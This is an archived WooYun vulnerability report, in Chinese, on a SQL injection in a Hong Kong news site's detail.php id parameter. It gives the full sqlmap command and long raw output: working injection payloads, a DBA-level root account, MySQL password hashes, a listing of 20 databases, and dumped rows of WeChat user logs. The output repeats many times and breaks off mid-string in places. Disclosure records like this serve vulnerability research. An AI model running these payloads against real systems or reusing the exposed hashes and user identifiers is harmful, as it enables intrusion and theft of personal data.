乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-09: 细节已通知厂商并且等待厂商处理中 2015-11-20: 厂商已经确认,细节仅向厂商公开 2015-11-30: 细节向核心白帽子及相关领域专家公开 2015-12-10: 细节向普通白帽子公开 2015-12-20: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
愛心新聞-國民教育新聞台
地址:http://**.**.**.**/detail.php?id=13597
python sqlmap.py -u "http://**.**.**.**/detail.php?id=13597" -p id --technique=BTU --random-agent -D wechat -T bl_weixin_log -C id,data --dump --threads=10 --start 1 --stop 5
1. DBA权限,root弱密码
current user: 'root@localhost'current user is DBA: Truedatabase management system users [4]:[*] 'calawa'@'localhost'[*] 'maracledb'@'localhost'[*] 'root'@'%'[*] 'root'@'localhost'database management system users password hashes:[*] calawa [1]: password hash: *1EEEFCFA35F1ED39D62F98F2C0255E198672DB23[*] maracledb [1]: password hash: *4BC9C2071D8A843BBFC4915E8B5E5B6274EDF5DD[*] root [1]: password hash: *B007A8ABA91B9610AD89FEDE5F38A5415F1514F7
2. 30多万用户ip信息泄露
Database: newsmydb+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| ipcount | 149827 |
Database: lovetv_news+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| ipcount | 161064 |
3. 用户微信操作记录泄露
Database: wechat+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| bl_weixin_log | 108 |
选取部分进行展示:
Database: wechatTable: bl_weixin_log[5 entries]+------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+| id | data |+------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+| 7213 | a:6:{s:10:"ToUserName";s:15:"gh_7faa910af686";s:12:"FromUserName";s:28:"oNiWWuMATRjQ9GQMLHS40jlHuTyM";s:10:"CreateTime";s:10:"1431101272";s:7:"MsgType";s:4:"text";s:7:"Content";s:3:"子";s:5:"MsgId";s:19:"6146533160709842432";} || 7214 | SELECT * FROM `bl_keyword` WHERE ( (`token` ='0' or token='gh_7faa910af686') ) AND ( `keyword` = ' || 7215 | SELECT * FROM `bl_keyword` WHERE ( (`token` ='0' or token='gh_7faa910af686') ) AND ( `keyword_type` > 0 ) ORDER BY keyword_length desc, id desc || 7216 | SELECT * FROM `bl_keyword` WHERE ( (`token` ='0' or token='gh_7faa910af686') ) AND ( `keyword` = '*' ) ORDER BY id desc LIMIT 1 || 7217 | Chat |+------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=13597 AND 6493=6493 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: id=13597 OR SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: id=-5998 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767871,0x68624678677162514549626c59795a7047536b757279776d6e4871756265417748786f5274674765,0x716b787171),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ----web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.4.38back-end DBMS: MySQL 5.0.12current user: 'root@localhost'current user is DBA: Truedatabase management system users [4]:[*] 'calawa'@'localhost'[*] 'maracledb'@'localhost'[*] 'root'@'%'[*] 'root'@'localhost'database management system users password hashes:[*] calawa [1]: password hash: *1EEEFCFA35F1ED39D62F98F2C0255E198672DB23[*] maracledb [1]: password hash: *4BC9C2071D8A843BBFC4915E8B5E5B6274EDF5DD[*] root [1]: password hash: *B007A8ABA91B9610AD89FEDE5F38A5415F1514F7columns LIKE 'pass' were found in the following databases:sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=13597 AND 6493=6493 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: id=13597 OR SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: id=-5998 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767871,0x68624678677162514549626c59795a7047536b757279776d6e4871756265417748786f5274674765,0x716b787171),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ----web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.4.38back-end DBMS: MySQL 5.0.12available databases [20]:[*] bebebehappy[*] bolaaw[*] calawa[*] calawa_hobby[*] card[*] cards[*] comlaw[*] fang[*] information_schema[*] jobs[*] lovetv_news[*] mydb[*] mysql[*] newsmydb[*] performance_schema[*] survey[*] talents[*] test[*] wechat[*] winesqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=13597 AND 6493=6493 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: id=13597 OR SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: id=-5998 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767871,0x68624678677162514549626c59795a7047536b757279776d6e4871756265417748786f5274674765,0x716b787171),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ----web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.4.38back-end DBMS: MySQL 5.0.12Database: lovetv_news[12 tables]+--------------+| ctrtb || hkl_news || ipaccess || ipcount || newstb || newstype || reportnews || shareuser || showdetailtb || showtb || showtype || vcount |+--------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=13597 AND 6493=6493 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: id=13597 OR SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: id=-5998 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767871,0x68624678677162514549626c59795a7047536b757279776d6e4871756265417748786f5274674765,0x716b787171),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ----web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.4.38back-end DBMS: MySQL 5.0.12sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=13597 AND 6493=6493 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: id=13597 OR SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: id=-5998 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767871,0x68624678677162514549626c59795a7047536b757279776d6e4871756265417748786f5274674765,0x716b787171),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ----web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.4.38back-end DBMS: MySQL 5.0.12Database: wechat[86 tables]+-----------------------------------+| bl_action || bl_action_log || bl_addon_category || bl_addons || bl_attachment || bl_attribute || bl_auth_extend || bl_auth_group || bl_auth_group_access || bl_auth_rule || bl_card_member || bl_card_notice || bl_category || bl_channel || bl_common_category || bl_common_category_group || bl_config || bl_coupon || bl_credit_config || bl_credit_data || bl_custom_menu || bl_custom_reply_mult || bl_custom_reply_news || bl_custom_reply_text || bl_document || bl_document_article || bl_document_download || bl_exam || bl_exam_answer || bl_exam_question || bl_extensions || bl_file || bl_follow || bl_forms || bl_forms_attribute || bl_forms_value || bl_forum || bl_hooks || bl_import || bl_keyword || bl_member || bl_member_public || bl_member_public_group || bl_member_public_link || bl_menu || bl_model || bl_picture || bl_prize || bl_qr_code || bl_scratch || bl_shop_footer || bl_shop_product || bl_smalltools || bl_sn_code || bl_store || bl_suggestions || bl_survey || bl_survey_answer || bl_survey_question || bl_test || bl_test_answer || bl_test_question || bl_tongji || bl_ucenter_admin || bl_ucenter_app || bl_ucenter_member || bl_ucenter_setting || bl_update_version || bl_url || bl_userdata || bl_vote || bl_vote_log || bl_vote_option || bl_weisite_category || bl_weisite_cms || bl_weisite_footer || bl_weisite_slideshow || bl_weixin_log || bl_youaskservice_behavior || bl_youaskservice_group || bl_youaskservice_keyword || bl_youaskservice_logs || bl_youaskservice_user || bl_youaskservice_wechat_enddate || bl_youaskservice_wechat_grouplist || bl_youaskservice_wxlogs |+-----------------------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=13597 AND 6493=6493 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: id=13597 OR SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: id=-5998 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767871,0x68624678677162514549626c59795a7047536b757279776d6e4871756265417748786f5274674765,0x716b787171),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ----web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.4.38back-end DBMS: MySQL 5.0.12Database: calawa_hobby+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| moves | 3414 || ipflow | 133 || musics | 102 || singer | 79 || moves_type | 30 || music_type | 8 || moves_tmp | 2 |+---------------------------------------+---------+Database: performance_schema+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| setup_consumers | 8 || performance_timers | 5 || setup_timers | 1 |+---------------------------------------+---------+Database: fang+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| newhouse | 10 || article | 4 || oldhouse | 4 |+---------------------------------------+---------+Database: calawa+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| newstb | 2677 || typenode | 128 || newstype | 38 || cz_music | 30 |+---------------------------------------+---------+Database: bebebehappy+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| news | 144 || cz_music | 30 || news_type | 15 || px_course | 15 || s_video | 12 || px_inspiration | 9 || px_coursetype | 6 || admin | 5 || manager | 2 |+---------------------------------------+---------+Database: newsmydb+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| ipcount | 149827 || vcount | 4257 || newstb | 3071 || ctrtb | 650 || reportnews | 71 || newstype | 16 || ipaccess | 6 || showtype | 6 || showtb | 5 || hkl_news | 1 || shareuser | 1 || showdetailtb | 1 |+---------------------------------------+---------+Database: lovetv_news+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| ipcount | 161064 || vcount | 5264 || newstb | 4494 || ctrtb | 982 || reportnews | 73 || newstype | 16 || showtype | 6 || showtb | 5 || hkl_news | 1 || ipaccess | 1 || shareuser | 1 || showdetailtb | 1 |+---------------------------------------+---------+Database: comlaw+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| r_comlaw | 138 || r_employee | 27 || member | 7 || mytest | 5 || sector | 4 |+---------------------------------------+---------+Database: test+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| dede_sys_enum | 3347 || dede_area | 482 || dede_sysconfig | 153 || dede_arctiny | 125 || dede_archives | 124 || dede_co_mediaurls | 83 || dede_addonarticle | 80 || dede_uploads | 79 || dede_co_htmls | 73 || dede_co_urls | 73 || dede_addonimages | 28 || dede_arccache | 22 || dede_arctype | 20 || dede_myad | 20 || dede_stepselect | 15 || dede_scores | 12 || dede_mytag | 10 || dede_addonshop | 8 || dede_addonsoft | 8 || dede_arcatt | 8 || dede_arcrank | 8 || dede_flinktype | 8 || dede_plus | 8 || dede_member | 7 || dede_sys_module | 7 || dede_channeltype | 6 || dede_flink | 6 || dede_member_flink | 6 || dede_search_keywords | 6 || dede_feedback | 5 || dede_co_note | 4 || dede_payment | 4 || dede_shops_delivery | 4 || dede_admintype | 3 || dede_co_onepage | 3 || dede_member_msg | 3 || dede_moneycard_type | 3 || dede_tagindex | 3 || dede_freelist | 2 || dede_member_model | 2 || dede_member_stow | 2 || dede_member_stowtype | 2 || dede_member_vhistory | 2 || dede_sys_set | 2 || dede_admin | 1 || dede_arcmulti | 1 || dede_guestbook | 1 || dede_homepageset | 1 || dede_member_group | 1 || dede_member_person | 1 || dede_member_space | 1 || dede_member_tj | 1 || dede_member_type | 1 || dede_softconfig | 1 || dede_vote | 1 |+---------------------------------------+---------+Database: talents+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| addresstb | 944 || basicinfo | 416 || family | 251 || events | 124 || resume | 62 || contract | 34 || typetb | 30 || typetb_copy | 30 || holiday | 7 || upost | 2 || admin | 1 |+---------------------------------------+---------+Database: wechat+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| bl_attribute | 509 || bl_auth_rule | 219 || bl_menu | 130 || bl_weixin_log | 108 || bl_model | 59 || bl_config | 43 || bl_addons | 31 || bl_credit_config | 19 || bl_credit_data | 17 || bl_hooks | 16 || bl_action | 12 || bl_custom_menu | 10 || bl_auth_extend | 8 || bl_addon_category | 4 || bl_tongji | 4 || bl_auth_group | 2 || bl_ucenter_member | 2 || bl_action_log | 1 || bl_category | 1 || bl_custom_reply_text | 1 || bl_document_article | 1 || bl_follow | 1 || bl_keyword | 1 || bl_member | 1 || bl_member_public | 1 || bl_member_public_link | 1 |+---------------------------------------+---------+Database: information_schema+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| COLUMNS | 3906 || STATISTICS | 642 || KEY_COLUMN_USAGE | 466 || PARTITIONS | 446 || TABLES | 446 || TABLE_CONSTRAINTS | 401 || SESSION_VARIABLES | 326 || GLOBAL_VARIABLES | 315 || GLOBAL_STATUS | 310 || SESSION_STATUS | 310 || COLLATION_CHARACTER_SET_APPLICABILITY | 195 || COLLATIONS | 195 || USER_PRIVILEGES | 55 || SCHEMA_PRIVILEGES | 54 || CHARACTER_SETS | 39 || PLUGINS | 20 || SCHEMATA | 20 || ENGINES | 9 || PROCESSLIST | 6 || INNODB_CMP | 5 || INNODB_CMP_RESET | 5 || INNODB_CMPMEM | 5 || INNODB_CMPMEM_RESET | 5 |+---------------------------------------+---------+Database: bolaaw+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| ofproperty | 28 || ofsecurityauditlog | 19 || blhappyvalue | 13 || blyyxl | 13 || ofpresence | 8 || ofuser | 8 || ofid | 5 || blhappybase | 4 || ofpubsubdefaultconf | 2 || ofmucservice | 1 || ofpubsubaffiliation | 1 || ofpubsubnode | 1 || ofversion | 1 |+---------------------------------------+---------+Database: mysql+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| help_relation | 1027 || help_topic | 508 || help_keyword | 464 || help_category | 38 || `user` | 4 || db | 3 || func | 1 || proxies_priv | 1 |+---------------------------------------+---------+Database: cards+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| `user` | 1 |+---------------------------------------+---------+Database: survey+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| `user` | 1 || question | 1 |+---------------------------------------+---------+Database: jobs+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| jobsname | 652 || jobstype | 42 || com_industry | 39 || jobs | 7 || jobsuser | 6 || jobcom | 4 || jobarticle | 2 || jobresume | 2 |+---------------------------------------+---------+Database: card+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| bl_picture | 276 || bl_auth_rule | 215 || bl_document | 172 || bl_document_card | 172 || bl_menu | 111 || bl_action_log | 66 || bl_config | 27 || bl_attribute | 26 || bl_auth_extend | 14 || bl_action | 11 || bl_hooks | 11 || bl_addons | 7 || bl_category | 6 || bl_auth_group | 3 || bl_channel | 3 || bl_member | 2 || bl_model | 2 || bl_ucenter_member | 2 || bl_auth_group_access | 1 |+---------------------------------------+---------+Database: mydb+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| rptodopic | 9602 || ipcount | 8370 || chappyshare | 6716 || rptodotb | 6705 || happyshare | 3206 || newstb | 2270 || projectpic | 852 || com3_todo | 593 || todotb | 434 || projecttb | 433 || comstb | 423 || ctrtb | 327 || admin | 203 || producttb | 149 || pruton_news | 115 || kehutb | 100 || assetstb | 90 || assetspic | 84 || pruton_englishnews | 38 || com3_admin | 31 || ggkehutb | 28 || typetb | 26 || calawarptype | 25 || comstypetb | 25 || ggkehutypetb | 25 || kehutypetb | 25 || mistypetb | 25 || newstype | 16 || mistb | 15 || basicinfo | 13 || comuserpic | 10 || materialtb | 9 || comroot | 7 || addresstb | 4 || com4_admin | 4 || com5_admin | 4 || productpic | 4 || comtb | 3 || ipaccess | 1 || mytb | 1 || wyhtodotb | 1 |+---------------------------------------+---------+sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=13597 AND 6493=6493 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: id=13597 OR SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: id=-5998 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767871,0x68624678677162514549626c59795a7047536b757279776d6e4871756265417748786f5274674765,0x716b787171),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ----web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.4.38back-end DBMS: MySQL 5.0.12columns LIKE 'pass' were found in the following databases:sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=13597 AND 6493=6493 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: id=13597 OR SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: id=-5998 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767871,0x68624678677162514549626c59795a7047536b757279776d6e4871756265417748786f5274674765,0x716b787171),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ----web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.4.38back-end DBMS: MySQL 5.0.12sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=13597 AND 6493=6493 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: id=13597 OR SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: id=-5998 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767871,0x68624678677162514549626c59795a7047536b757279776d6e4871756265417748786f5274674765,0x716b787171),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ----web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.4.38back-end DBMS: MySQL 5.0.12Database: lovetv_newsTable: ipcount[4 columns]+--------+-------------+| Column | Type |+--------+-------------+| id | numeric || ip | non-numeric || page | non-numeric || site | non-numeric |+--------+-------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=13597 AND 6493=6493 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: id=13597 OR SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: id=-5998 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767871,0x68624678677162514549626c59795a7047536b757279776d6e4871756265417748786f5274674765,0x716b787171),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ----web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.4.38back-end DBMS: MySQL 5.0.12Database: wechatTable: bl_weixin_log[2 columns]+--------+-------------+| Column | Type |+--------+-------------+| data | non-numeric || id | numeric |+--------+-------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=13597 AND 6493=6493 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: id=13597 OR SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: id=-5998 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767871,0x68624678677162514549626c597sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=13597 AND 6493=6493 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: id=13597 OR SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: id=-5998 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767871,0x68624678677162514549626c597sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=13597 AND 6493=6493 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: id=13597 OR SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: id=-5998 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767871,0x68624678677162514549626c597sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=13597 AND 6493=6493 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: id=13597 OR SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: id=-5998 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767871,0x68624678677162514549626c59795a7047536b757279776d6e4871756265417748786f5274674765,0x716b787171),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ----web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.4.38back-end DBMS: MySQL 5.0.12Database: wechatTable: bl_weixin_log[5 entries]+------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+| id | data |+------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+| 7213 | a:6:{s:10:"ToUserName";s:15:"gh_7faa910af686";s:12:"FromUserName";s:28:"oNiWWuMATRjQ9GQMLHS40jlHuTyM";s:10:"CreateTime";s:10:"1431101272";s:7:"MsgType";s:4:"text";s:7:"Content";s:3:"子";s:5:"MsgId";s:19:"6146533160709842432";} || 7214 | SELECT * FROM `bl_keyword` WHERE ( (`token` ='0' or token='gh_7faa910af686') ) AND ( `keyword` = ' || 7215 | SELECT * FROM `bl_keyword` WHERE ( (`token` ='0' or token='gh_7faa910af686') ) AND ( `keyword_type` > 0 ) ORDER BY keyword_length desc, id desc || 7216 | SELECT * FROM `bl_keyword` WHERE ( (`token` ='0' or token='gh_7faa910af686') ) AND ( `keyword` = '*' ) ORDER BY id desc LIMIT 1 || 7217 | Chat |+------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
上WAF。
危害等级:中
漏洞Rank:5
确认时间:2015-11-20 15:33
Referred to related parties.
暂无